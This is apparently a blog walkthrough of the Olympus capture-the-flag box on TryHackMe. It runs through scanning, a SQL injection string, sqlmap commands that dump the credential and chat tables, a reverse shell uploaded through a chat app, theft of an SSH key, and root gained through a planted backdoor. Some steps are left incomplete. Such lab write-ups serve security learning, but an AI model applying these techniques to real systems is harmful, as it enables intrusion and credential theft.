This walkthrough covers the Olympus CTF found on TryHackMe. The goal of this challenge is to exploit an SQLi vulnerability in a CMS, use sqlmap to acquire user credentials by extracting a database, identify a subdomain hosting a chat application, upload a reverse shell to establish a foothold on the system and take advantage of a poorly managed SUID binary to escalate privileges.
Step 1: What's Out There?
nmap -sS -sV -sC -p 22,80 olympus.thm --min-rate=1000
Step 2: FFUF
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt:FUZZ -u http://olympus.thm/FUZZ -fc 403
We discovered a directory named
~webmaster, which is where the CMS is located.
Step 3: SQLi
Testing the Victor CMS search field feature reveals an SQLi:
'SELECT * FROM users WHERE username='' and password='' OR 1=1;
Let's capture this with
Burp Suite and plug it into
sqlmap to automate our injection attack.
Copy this over to a text editor and run it through
We discovered a flag in olympus, let's dump it.
Let's obtain our first flag.
sqlmap -r req.txt --batch --dump -T flag -D olympus
Now let's see what that user's table can offer us.
Juicy credentials, we can crack the password hash to prometheus and use it to log in to the chat application.
Step 4: Enumerate Subdomain
We discovered three users: root, zeus, and prometheus. Additionally, we discovered a subdomain called
chat that can be added to our
Let's enumerate the newly discovered subdomain.
I'm sure the uploads directory will play an important role later, in the meantime let's see if we can log in with these credentials.
And we're in. There looks to be an upload feature, let's see if we can upload a reverse shell.
It looks to have been uploaded somewhere, but not sure where. Let's go back to
sqlmap and dump the chats table to see if the file name was changed upon uploading.
sqlmap -r req.txt --batch --dump -T chats -D olympus
Looks like it did. Let's copy this and see if we can visit and go to it using the
/uploads/ directory we found earlier.
Going to the path drops us into a shell. Searching for SUID binaries reveals
We can copy over zeus
id_rsa key and then ssh in with it.
Crack it using
Step 5: Privesc and Root
After looking around the file system for a while we discovered this:
Inside the PHP file seems to be a backdoor.
uname -a; w; /lib/defended/libc.so.99 drops us into a root shell.
This box was very difficult for me. I don't consider myself to be that knowledgeable on SQLi attacks, so I had to resort to a lot of googling to help me through. I will definitely give this box several more runs as I need to sharpen my command injection skills. As always, Happy Hacking!